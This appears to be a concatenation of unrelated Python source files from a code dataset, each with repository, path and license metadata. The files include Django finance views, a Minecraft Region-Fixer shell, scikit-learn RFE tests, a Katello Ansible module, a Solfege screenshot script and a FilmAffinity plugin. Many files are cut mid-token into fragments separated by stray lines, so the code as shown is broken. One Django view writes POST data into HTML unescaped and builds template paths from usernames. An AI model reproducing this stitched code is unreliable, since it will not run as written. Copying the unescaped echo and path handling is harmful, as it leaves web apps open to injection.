dis = gxf.disassemble_lines(regs.get('pc')).lines[:1]
except gxf.GdbError:
dis = ()
for line in dis:
for _, t in line.tokens[line.instidx:]:
tomark.append(t)
tomark.extend(regs.impact.get(t, ()))
for reg, val in regs.regs.items():
if reg == "eflags" or (len(reg) == 2 and reg[1] == "s"):
continue
if reg in tomark:
ttype = Token.Name.Builtin
elif reg in ("rdi", "rsi", "rdx", "rcx", "r8", "r9"):
ttype = Token.Text
elif reg in ("rip", "eip", "rbp", "esp", "rsp", "rax", "eax"):
ttype = Token.Generic.Heading
else:
ttype = Token.Comment
print("%s%s" % (
Formattable(((ttype, "%-4s" % reg),
(Token.Comment, ": "))),
memory.refchain(val)))
|
saigkrish/finance
|
PY/views.py
|
Python
|
apache-2.0
| 3,119
| 0.021481
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils.html import escape
from django.views.decorators.csrf import ensure_csrf_cookie
from django.contrib.auth import authenticate, login, logout
import json
# Create your views here.
@ensure_csrf_cookie
def index(request):
return render(request, 'fin/index.html', {})
def table(request,ticker):
template_name='fin/table_'+ticker+'.html'
# Fill the type of user programmatically - TBD
return render(request, template_name, {'user_profile':'anonymous'})
#return render(request, template_name, {'user_profile':'nameduser'})
#return render(request, template_name, {'user_profile':'premiumuser'})
def jspractice(request):
return render(request, 'fin/js.html', {})
def dfcf_input_modify(request):
txt=""
for key in request.POST:
value = request.POST[key]
txt += str(key) + "::" + str(value) + "<br>"
txt += "<br><br>"
dat = request.POST['dfcf_ip_params']
jdat = json.loads(dat)
for key in jdat:
value = jdat[key]
txt += str(key) + "::" + str(value) + "<br>"
txt += "<br><br>"
for key in jdat:
rev_growth = float(jdat[key]['rev_growth'])
ear_growth = float(jdat[key]['earnings_growth'])
txt += str(key) + "::" + "revenue grows at" + str(100*rev_growth) + "% <br>"
txt += str(key) + "::" + "Earnings grow at" + str(100*ear_growth) + "% <br>"
txt
|
+=
|
"<br><br>Changeset details<br><br>"
changeset = request.POST['dfcf_ip_changeset']
jchangeset = json.loads(changeset)
for key in jchangeset:
value = jchangeset[key]
txt += str(key) + "::" + str(value) + "<br>"
txt += "<br><br>"
txt += escape(repr(request))
return HttpResponse(txt)
# return HttpResponse(request.POST['fname'])
# caller should ensure it is a POST etc.
def fin_auth (request):
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return True
return False
@ensure_csrf_cookie
def dfcf_input(request, action="none"):
template_name='fin/dfcf_input_parameters.html'
u = request.user
if action == "logout":
logout(request)
return render(request, template_name, {'user_profile':'anonymous'})
if u.is_authenticated():
template_name = 'fin/'+u.username+'/dfcf_input_parameters.html'
return render(request, template_name, {'user_profile':'anonymous'})
if (request.method != 'POST'):
return render(request, template_name, {'user_profile':'anonymous'})
if (fin_auth(request)):
template_name='fin/'+request.POST.get('username')+'/dfcf_input_parameters.html'
return render(request, template_name, {'user_profile':'anonymous'})
#return render(request, template_name, {'user_profile':'nameduser'})
#return render(request, template_name, {'user_profile':'premiumuser'})
|
eduNEXT/edunext-platform
|
import_shims/studio/contentstore/config/tests/__init__.py
|
Python
|
agpl-3.0
| 398
| 0.01005
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('contentstore.config.tests'
|
, 'cms.djangoap
|
ps.contentstore.config.tests')
from cms.djangoapps.contentstore.config.tests import *
|
plotly/python-api
|
packages/python/plotly/plotly/validators/sankey/domain/_row.py
|
Python
|
mit
| 474
| 0.00211
|
import _plotly_utils.b
|
asevalidators
class RowValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(self, plotly_name="row", parent_name="sankey.domain", **kwargs):
super(RowValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "ca
|
lc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "info"),
**kwargs
)
|
Fenixin/Minecraft-Region-Fixer
|
regionfixer_core/interactive.py
|
Python
|
gpl-3.0
| 24,997
| 0.002961
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Region Fixer.
# Fix your region files with a backup copy of your Minecraft world.
# Copyright (C) 2020 Alejandro Aguilera (Fenixin)
# https://github.com/Fenixin/Minecraft-Region-Fixer
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for
|
more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from cmd import Cmd
import regionfixer_core.constants as c
from regionfixer_core import world
from regionfixer_core.scan import consol
|
e_scan_world, console_scan_regionset
class InteractiveLoop(Cmd):
def __init__(self, world_list, regionset, options, backup_worlds):
Cmd.__init__(self)
self.world_list = world_list
self.regionset = regionset
self.world_names = [str(i.name) for i in self.world_list]
# if there's only one world use it
if len(self.world_list) == 1 and len(self.regionset) == 0:
self.current = world_list[0]
elif len(self.world_list) == 0 and len(self.regionset) > 0:
self.current = self.regionset
else:
self.current = None
self.options = options
self.backup_worlds = backup_worlds
self.prompt = "#-> "
self.intro = ("Minecraft Region-Fixer interactive mode.\n(Use tab to "
"autocomplete. Type help for a list of commands.)\n")
# Possible args for chunks stuff
possible_args = ""
first = True
for i in list(c.CHUNK_PROBLEMS_ARGS.values()) + ['all']:
if not first:
possible_args += ", "
possible_args += i
first = False
self.possible_chunk_args_text = possible_args
# Possible args for region stuff
possible_args = ""
first = True
for i in list(c.REGION_PROBLEMS_ARGS.values()) + ['all']:
if not first:
possible_args += ", "
possible_args += i
first = False
self.possible_region_args_text = possible_args
#################################################
# Do methods
#################################################
def do_set(self, arg):
""" Command to change some options and variables in interactive
mode """
args = arg.split()
if len(args) > 2:
print("Error: too many parameters.")
elif len(args) == 0:
print("Write \'help set\' to see a list of all possible variables")
else:
if args[0] == "entity-limit":
if len(args) == 1:
print("entity-limit = {0}".format(self.options.entity_limit))
else:
try:
if int(args[1]) >= 0:
self.options.entity_limit = int(args[1])
print("entity-limit = {0}".format(args[1]))
print("Updating chunk status...")
self.current.rescan_entities(self.options)
else:
print("Invalid value. Valid values are positive integers and zero")
except ValueError:
print("Invalid value. Valid values are positive integers and zero")
elif args[0] == "workload":
if len(args) == 1:
if self.current:
print("Current workload:\n{0}\n".format(self.current.__str__()))
print("List of possible worlds and region-sets (determined by the command used to run region-fixer):")
number = 1
for w in self.world_list:
print(" ### world{0} ###".format(number))
number += 1
# add a tab and print
for i in w.__str__().split("\n"):
print("\t" + i)
print()
print(" ### regionset ###")
for i in self.regionset.__str__().split("\n"):
print("\t" + i)
print("\n(Use \"set workload world1\" or name_of_the_world or regionset to choose one)")
else:
a = args[1]
if len(a) == 6 and a[:5] == "world" and int(a[-1]) >= 1:
# get the number and choos the correct world from the list
number = int(args[1][-1]) - 1
try:
self.current = self.world_list[number]
print("workload = {0}".format(self.current.world_path))
except IndexError:
print("This world is not in the list!")
elif a in self.world_names:
for w in self.world_list:
if w.name == args[1]:
self.current = w
print("workload = {0}".format(self.current.world_path))
break
else:
print("This world name is not on the list!")
elif args[1] == "regionset":
if len(self.regionset):
self.current = self.regionset
print("workload = set of region files")
else:
print("The region set is empty!")
else:
print("Invalid world number, world name or regionset.")
elif args[0] == "processes":
if len(args) == 1:
print("processes = {0}".format(self.options.processes))
else:
try:
if int(args[1]) > 0:
self.options.processes = int(args[1])
print("processes = {0}".format(args[1]))
else:
print("Invalid value. Valid values are positive integers.")
except ValueError:
print("Invalid value. Valid values are positive integers.")
elif args[0] == "verbose":
if len(args) == 1:
print("verbose = {0}".format(str(self.options.verbose)))
else:
if args[1] == "True":
self.options.verbose = True
print("verbose = {0}".format(args[1]))
elif args[1] == "False":
self.options.verbose = False
print("verbose = {0}".format(args[1]))
else:
print("Invalid value. Valid values are True and False.")
else:
print("Invalid argument! Write \'help set\' to see a list of valid variables.")
def do_summary(self, arg):
""" Prints a summary of all the problems found in the region
files. """
if len(arg) == 0:
if self.current:
if self.current.scanned:
text = self.current.generate_report(True)
if text:
print(text)
else:
print("No problems found!")
else:
print("The world hasn't be scanned (or it needs a rescan). Use \'scan\' to scan it.")
else:
print("No world/region-set is set! Use \'set workload\' to set a w
|
yuanyelele/solfege
|
solfege/make_screenshots.py
|
Python
|
gpl-3.0
| 6,516
| 0.001842
|
import os
import time
from gi.repository import Gtk
import solfege
from solfege.profilemanager import ChangeProfileDialog
from solfege.practisesheetdlg import PractiseSheetDialog
from solfege.trainingsetdlg import TrainingSetDialog
def run(cmd):
print cmd
os.system(cmd)
def compress(fn):
f, ext = os.path.splitext(fn)
run("pngnq -n 16 -f %s" % fn)
run("mv %s-nq8.png %s" % (f, fn))
def screenshot(windowtitle, lang, fn):
while Gtk.events_pending():
Gtk.main_iteration()
time.sleep(2)
while Gtk.events_pending():
Gtk.main_iteration()
fn = "help/%s/figures/%s" % (lang, fn)
cmd = u'import -window %s %s' % (windowtitle, fn)
print cmd
os.system(cmd.encode("utf-8"))
compress(fn)
def do_profile_manager(lang):
p = ChangeProfileDialog(solfege.app.m_options.profile)
p.show()
pid = hex(p.vbox.get_parent_window().xid)
screenshot(pid, lang, "profile-manager.png")
p.destroy()
def do_practise_sheet(lang):
dlg = PractiseSheetDialog()
dlg.show_all()
pid = hex(dlg.vbox.get_parent_window().xid)
dlg.on_select_exercise(None, u'solfege:lesson-files/melodic-intervals-down-3')
screenshot(pid, lang, "ear-training-test-printout-editor.png")
dlg.do_closing_stuff()
dlg.destroy()
def do_training_set(lang):
dlg = TrainingSetDialog()
dlg.show_all()
dlg.on_select_exercise(None, u'solfege:lesson-files/chord-m7-7')
dlg.on_select_exercise(None, u'solfege:lesson-files/melodic-intervals-up')
pid = hex(dlg.get_children()[0].get_parent_window().xid)
screenshot(pid, lang, "trainingset-editor.png")
dlg.do_closing_stuff()
dlg.destroy()
def do_preferences_window(lang):
solfege.win.open_preferences_window(None)
xid = hex(solfege.win.g_config_window.get_children()[0].get_parent_window().xid)
solfege.win.g_config_window.set_resizable(False)
solfege.win.g_config_window.set_position(Gtk.WindowPosition.CENTER_ALWAYS)
solfege.win.g_config_window.g_pview.expand_all()
screenshot(xid, lang, "preferences-midi.png")
solfege.win.g_config_window.g_pview.set_cursor((1,))
screenshot(xid, lang, "preferences-user.png")
solfege.win.g_config_window.g_pview.set_cursor((2,))
screenshot(xid, lang, "preferences-external-programs.png")
solfege.win.g_config_window.g_pview.set_cursor((3,))
screenshot(xid, lang, "preferences-gui.png")
solfege.win.g_config_window.g_pview.set_cursor((3, 0))
screenshot(xid, lang, "preferences-gui-idtone.png")
solfege.win.g_config_window.g_pview.set_cursor((3, 1))
screenshot(xid, lang, "preferences-gui-interval.png")
solfege.win.g_config_window.g_pview.set_cursor((4,))
screenshot(xid, lang, "preferences-practise.png")
solfege.win.g_config_window.g_pview.set_cursor((5,))
screenshot(xid, lang, "preferences-sound-setup.png")
solfege.win.g_config_window.g_pview.set_cursor((6,))
screenshot(xid, lang, "preferences-statistics.png")
solfege.win.g_config_window.hide()
def do_exercises(lang, xid):
solfege.app.practise_lessonfile(u"solfege:lesson-files/harmonic-intervals-3")
solfege.win.get_view().use_inputwidget(0)
screenshot(xid, lang, "id-interval-buttons-thirds.png")
solfege.win.get_view().use_inputwidget(1)
screenshot(xid, lang, "id-interval-piano.png")
solfege.win.get_view().g_notebook.set_current_page(2)
screenshot(xid, lang, "statistics.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/melodic-intervals-3")
solfege.win.get_view().use_inputwidget(0)
screenshot(xid, lang, "melodicinterval-buttons.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/sing-intervals-4-5")
solfege.win.get_view().new_question()
screenshot(xid, lang, "singinterval.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/chord-min-major")
screenshot(xid, lang, "idbyname-chords.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/chord-min-major-close-open")
screenshot(xid, lang, "chord.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/singchord-1")
solfege.win.get_view().new_question()
screenshot(xid, lang, "singchord.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/rhythm-easy")
solfege.win.get_view().new_question()
screenshot(xid, lang, "rhythm.png")
solfege.app.practise_lessonfile(u"solfege:regression-lesson-files/rhythmtapping2-1")
screenshot(xid, lang, "rhythmtapping2.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/jsb-inventions")
screenshot(xid, lang, "dictation.png")
solfeg
|
e.app.practise_lessonfile(u"solfege:lesson-files/csound-fifth-0.99")
screenshot(xid, lang, "idbyname-intonation.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/id-tone-cde-3")
screenshot(xid, lang, "idtone.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/bpm")
screenshot(xid, lang, "identifybpm.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/twelvetone")
solfege.win.get_view().new_question()
screenshot(xid, la
|
ng, "twelvetone.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/nameinterval-2")
solfege.win.get_view().new_question()
screenshot(xid, lang, "nameinterval.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/progression-2")
screenshot(xid, lang, "elembuilder-harmonic-progressions.png")
solfege.app.practise_lessonfile(u"solfege:lesson-files/toneincontext-major-f4")
screenshot(xid, lang, "toneincontext.png")
def make_screenshots():
if not (os.path.exists("configure.ac")
and os.path.exists("help/C/solfege.xml.in")
and os.path.exists("solfege.py")):
print "I don't think you are in the source directory of"
print "GNU Solfege, so I refuse to continue."
solfege.win.quit_program()
return
lang = os.environ['LANGUAGE'].split(":")[0]
if not os.path.exists(os.path.join("help", lang)):
lang = lang.split("_")[0]
if not os.path.exists(os.path.join("help", lang)):
print "Unknown language"
solfege.win.quit_program()
return
xid = hex(solfege.win.get_view().get_parent_window().xid)
if not os.path.exists("help/%s/figures" % lang):
os.makedirs("help/%s/figures" % lang)
do_profile_manager(lang)
do_practise_sheet(lang)
do_training_set(lang)
do_preferences_window(lang)
do_exercises(lang, xid)
solfege.win.quit_program()
|
NdagiStanley/inventory
|
manage.py
|
Python
|
mit
| 807
| 0
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "inventory.settin
|
gs")
try:
from django.core.management import execute_from_command_line
except ImportError:
|
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
Eric89GXL/scikit-learn
|
sklearn/feature_selection/tests/test_rfe.py
|
Python
|
bsd-3-clause
| 3,356
| 0.000298
|
"""
Testing Recursive feature elimination
"""
import warnings
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from nose.tools import assert_equal
from scipy import sparse
from sklearn.feature_selection.rfe import RFE, RFECV
from sklearn.datasets import load_iris
from sklearn.metrics import zero_one_loss
from sklearn.svm import SVC
from sklearn.utils import check_random_state
from sklearn.metrics.scorer import SCORERS
def test_rfe_set_params():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = iris.target
clf = S
|
VC(kernel="linear")
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
y_pred = rfe.fit(X, y).predict(X)
clf = SVC()
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1,
estimator_params={'kernel': 'linear'})
y_pred2 = rfe.fit(X, y).predict(X)
assert_array
|
_equal(y_pred, y_pred2)
def test_rfe():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
X_sparse = sparse.csr_matrix(X)
y = iris.target
# dense model
clf = SVC(kernel="linear")
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
rfe.fit(X, y)
X_r = rfe.transform(X)
clf.fit(X_r, y)
assert_equal(len(rfe.ranking_), X.shape[1])
# sparse model
clf_sparse = SVC(kernel="linear")
rfe_sparse = RFE(estimator=clf_sparse, n_features_to_select=4, step=0.1)
rfe_sparse.fit(X_sparse, y)
X_r_sparse = rfe_sparse.transform(X_sparse)
assert_equal(X_r.shape, iris.data.shape)
assert_array_almost_equal(X_r[:10], iris.data[:10])
assert_array_almost_equal(rfe.predict(X), clf.predict(iris.data))
assert_equal(rfe.score(X, y), clf.score(iris.data, iris.target))
assert_array_almost_equal(X_r, X_r_sparse.toarray())
def test_rfecv():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = list(iris.target) # regression test: list should be supported
# Test using the score function
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
rfecv.fit(X, y)
# non-regression test for missing worst feature:
assert_equal(len(rfecv.grid_scores_), X.shape[1])
assert_equal(len(rfecv.ranking_), X.shape[1])
X_r = rfecv.transform(X)
# All the noisy variable were filtered out
assert_array_equal(X_r, iris.data)
# same in sparse
rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
X_sparse = sparse.csr_matrix(X)
rfecv_sparse.fit(X_sparse, y)
X_r_sparse = rfecv_sparse.transform(X_sparse)
assert_array_equal(X_r_sparse.toarray(), iris.data)
# Test using a customized loss function
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
loss_func=zero_one_loss)
with warnings.catch_warnings(record=True):
rfecv.fit(X, y)
X_r = rfecv.transform(X)
assert_array_equal(X_r, iris.data)
# Test using a scorer
scorer = SCORERS['accuracy']
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
scoring=scorer)
rfecv.fit(X, y)
X_r = rfecv.transform(X)
assert_array_equal(X_r, iris.data)
|
python-cmd2/cmd2
|
plugins/template/tests/test_myplugin.py
|
Python
|
mit
| 1,894
| 0.000528
|
#
# coding=utf-8
import cmd2_myplugin
from cmd2 import (
cmd2,
)
######
#
# define a class which uses our plugin and some convenience functions
#
######
class MyApp(cmd2_myplugin.MyPluginMixin, cmd2.Cmd):
"""Simple subclass of cmd2.Cmd with our SayMixin plugin included."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2_myplugin.empty_decorator
def do_empty(self, args):
self.poutput("running the empty command")
#
# You can't use a fixture to instantiate
|
your app if you want to use
# to use the capsys fixture to capture the output. cmd2.Cmd sets
# internal variables to sys.stdout and sys.stderr on initialization
# and then uses those internal variables instead of sys.stdout. It does
# this so you can redirect output from within the app. The capsys fixture
# can't capture the output properly in this scenario.
#
# If
|
you have extensive initialization needs, create a function
# to initialize your cmd2 application.
def init_app():
app = MyApp()
return app
#####
#
# unit tests
#
#####
def test_say(capsys):
# call our initialization function instead of using a fixture
app = init_app()
# run our mixed in command
app.onecmd_plus_hooks('say hello')
# use the capsys fixture to retrieve the output on stdout and stderr
out, err = capsys.readouterr()
# make our assertions
assert out == 'in postparsing hook\nhello\n'
assert not err
def test_decorator(capsys):
# call our initialization function instead of using a fixture
app = init_app()
# run one command in the app
app.onecmd_plus_hooks('empty')
# use the capsys fixture to retrieve the output on stdout and stderr
out, err = capsys.readouterr()
# make our assertions
assert out == 'in postparsing hook\nin the empty decorator\nrunning the empty command\n'
assert not err
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractIanEnglishmanabroadBlogspotCom.py
|
Python
|
bsd-3-clause
| 577
| 0.032929
|
def extractIanEnglishmanabroadBlogspotCom(item):
'''
Parser for 'ian-englishmanabroad.blogspot.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagma
|
p = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseM
|
essageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
pgurumur/netconf
|
core/lib/__init__.py
|
Python
|
isc
| 791
| 0.001264
|
# Copyright (c) 2015 Prabhu Gurumurthy <pgurumur@users.noreply.github.com>
# Permission to use, copy, modify, and distribute this softw
|
are for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR
|
ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
Tatsh-ansible/ansible
|
lib/ansible/modules/remote_management/foreman/katello.py
|
Python
|
gpl-3.0
| 16,607
| 0.002409
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Eric D Helms <ericdhelms@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: katello
short_description: Manage Katello Resources
description:
- Allows the management of Katello resources inside your Foreman server
version_added: "2.3"
author: "Eric D Helms (@ehelms)"
requirements:
- "nailgun >= 0.28.0"
- "python >= 2.6"
- datetime
options:
server_url:
description:
- URL of Foreman server
required: true
username:
description:
- Username on Foreman server
required: true
password:
description:
- Password for user accessing Foreman server
required: true
entity:
description:
- The Foreman resource that the action will be performed on (e.g. organization, host)
required: true
params:
description:
- Parameters associated to the entity resource to set or edit in dictionary format (e.g. name, description)
required: true
'''
EXAMPLES = '''
---
# Simple Example:
- name: "Create Product"
local_action:
module: katello
username: "admin"
password: "admin"
server_url: "https://fakeserver.com"
entity: "product"
params:
name: "Centos 7"
# Abstraction Example:
# katello.yml
---
- name: "{{ name }}"
local_action:
module: katello
username: "admin"
password: "admin"
server_url: "https://fakeserver.com"
entity: "{{ entity }}"
params: "{{ params }}"
# tasks.yml
---
- include: katello.yml
vars:
name: "Create Dev Environment"
entity: "lifecycle_environment"
params:
name: "Dev"
prior: "Library"
organization: "Default Organization"
- include: katello.yml
vars:
name: "Create Centos Product"
entity: "product"
params:
name: "Centos 7"
organization: "Default Organization"
- include: katello.yml
vars:
name: "Create 7.2 Repository"
entity: "repository"
params:
name: "Centos 7.2"
product: "Centos 7"
organization: "Default Organization"
content_type: "yum"
url: "http://mirror.centos.org/centos/7/os/x86_64/"
- include: katello.yml
vars:
name: "Create Centos 7 View"
entity: "content_view"
params:
name: "Centos 7 View"
organization: "Default Organization"
repositories:
- name: "Centos 7.2"
product: "Centos 7"
- include: katello.yml
vars:
name: "Enable RHEL Product"
entity: "repository_set"
params:
name: "Red Hat Enterprise Linux 7 Server (RPMs)"
product: "Red Hat Enterprise Linux Server"
organization: "Default Organization"
basearch: "x86_64"
releasever: "7"
'''
RETURN = '''# '''
import datetime
import os
import traceback
try:
from nailgun import entities, entity_fields, entity_mixins
from nailgun.config import ServerConfig
HAS_NAILGUN_PACKAGE = True
except:
HAS_NAILGUN_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class NailGun(object):
def __init__(self, server, entities, module):
self._server = server
self._entities = entities
self._module = module
entity_mixins.TASK_TIMEOUT = 1000
def find_organization(self, name, **params):
org = self._entities.Organization(self._server, name=name, **params)
response = org.search(set(), {'search': 'name={}'.format(name)})
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No organization found for %s" % name)
def find_lifecycle_environment(self, name, organization):
org = self.find_organization(organization)
lifecycle_env = self._entities.LifecycleEnvironment(self._server, name=name, organization=org)
response = lifecycle_env.search()
|
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Lifecycle Found found for %s" % name)
def find_product(self, name, org
|
anization):
org = self.find_organization(organization)
product = self._entities.Product(self._server, name=name, organization=org)
response = product.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Product found for %s" % name)
def find_repository(self, name, product, organization):
product = self.find_product(product, organization)
repository = self._entities.Repository(self._server, name=name, product=product)
repository._fields['organization'] = entity_fields.OneToOneField(entities.Organization)
repository.organization = product.organization
response = repository.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Repository found for %s" % name)
def find_content_view(self, name, organization):
org = self.find_organization(organization)
content_view = self._entities.ContentView(self._server, name=name, organization=org)
response = content_view.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Content View found for %s" % name)
def organization(self, params):
name = params['name']
del params['name']
org = self.find_organization(name, **params)
if org:
org = self._entities.Organization(self._server, name=name, id=org.id, **params)
org.update()
else:
org = self._entities.Organization(self._server, name=name, **params)
org.create()
return True
def manifest(self, params):
org = self.find_organization(params['organization'])
params['organization'] = org.id
try:
file = open(os.getcwd() + params['content'], 'r')
content = file.read()
finally:
file.close()
manifest = self._entities.Subscription(self._server)
try:
manifest.upload(
data={'organization_id': org.id},
files={'content': content}
)
return True
except Exception as e:
if "Import is the same as existing data" in e.message:
return False
else:
self._module.fail_json(msg="Manifest import failed with %s" % to_native(e),
exception=traceback.format_exc())
def product(self, params):
org = self.find_organization(params['organization'])
params['organization'] = org.id
product = self._entities.Product(self._server, **params)
response = product.search()
if len(response) == 1:
product.id = response[0].id
product.update()
else:
product.create()
return True
def sync_product(self, params):
org = self.find_organization(params['organization'])
product = self.find_product(params['name'], org.name)
return product.sync()
def repository(self, params):
product = self.find_product(params['product'], params['organization'])
params['product'] = product.id
del params['organization']
repository = self._entities.Repository(self._server, **params)
repository._fields['organization'] = entity_fields.OneToOneField(entities.Organization)
repository.organization = product.organization
response = repository.search()
if len(response) == 1:
repository.id = response[0].id
repository.update
|
freevo/freevo1
|
src/video/plugins/filmaffinity.py
|
Python
|
gpl-2.0
| 23,935
| 0.007312
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Plugin for FILMAFFINITY support
# -----------------------------------------------------------------------
# $Id$
# Version: 080607_01
#
# Notes: FilmAffinity plugin. You can add FilmAffinity.com informations for video items
# with the plugin
# Activate with: plugin.activate('video.filmaffinity')
# And add the following lines to your configuration file:
# FILMAFFINITY_AUTOACCEPT_SINGLE_HIT = True
# It uses also directly the variables:
# - FILMAFFINITY_REMOVE_FROM_LABEL
# - FILMAFFINITY_REMOVE_FROM_SEARCHSTRING
# as the same words shall be removed also for FilmAffinity.
# You can also set filmaffinity_search on a key (e.g. '1') by setting
# EVENTS['menu']['1'] = Event(MENU_CALL_ITEM_ACTION, arg='filmaffinity_search_or_cover_search')
#
# Todo: - Update existing FXD file
# - DVD/VCD support (discset ??)
#
# Author: S. FABRE for Biboobox, http://www.lahiette.com/biboobox
# RE-Author: Jose Maria Franco Fraiz
#
# -----------------------------------------------------------------------
# Freevo - A Home Theater PC framework
# Copyright (C) 2002 Krister Lagerstrom, et al.
# Please see the file freevo/Docs/CREDITS for a complete list of authors.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MER-
# CHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# ----------------------------------------------------------------------- */
import logging
logger = logging.getLogger("freevo.video.plugins.filmaffinity")
import re
import socket
socket.setdefaulttimeout(30.0)
import urllib2, urlparse, commands
import sys
import os
import traceback
import menu
import config
import plugin
import time
from util import htmlenties2txt
from util import fxdparser
from gui.PopupBox import PopupBox
from util.fxdimdb import makeVideo, point_maker
#beautifulsoup module
from BeautifulSoup import BeautifulSoup
# headers for urllib2
txdata = None
txheaders = {
'User-Agent': 'freevo (%s)' % sys.platform,
'Accept-Language': 'es-es',
}
class PluginInterface(plugin.ItemPlugin):
"""
This plugin obtains movie information in Spanish from the FilmAffinity
website
Configuration::
plugin.activate('video.filmaffinity')
FILMAFFINITY_REMOVE_FROM_LABEL = ('\(.*?\)', '\[.*?\]', 'cd[0-9]+(-[0-9])?', 'title[0-9]+', 'by .*$')
FILMAFFINITY_REMOVE_FROM_SEARCHSTRING = ('spanish','xvid','dvdrip','parte','[0-9]*','dvdscreener','mp3')
FILMAFFINITY_AUTOACCEPT_SINGLE_HIT = True
"""
def __init__(self, license=None):
"""Initialise class instance"""
# these are considered as private variables - don't mess with them unless
# no other choise is given
# fyi, the other choice always exists: add a subroutine or ask :)
if not config.SYS_USE_NETWORK:
|
self.reason = 'SYS_USE_NETWORK not enabled'
return
plugin.ItemPlugin.__init__(self)
def config(self):
return [
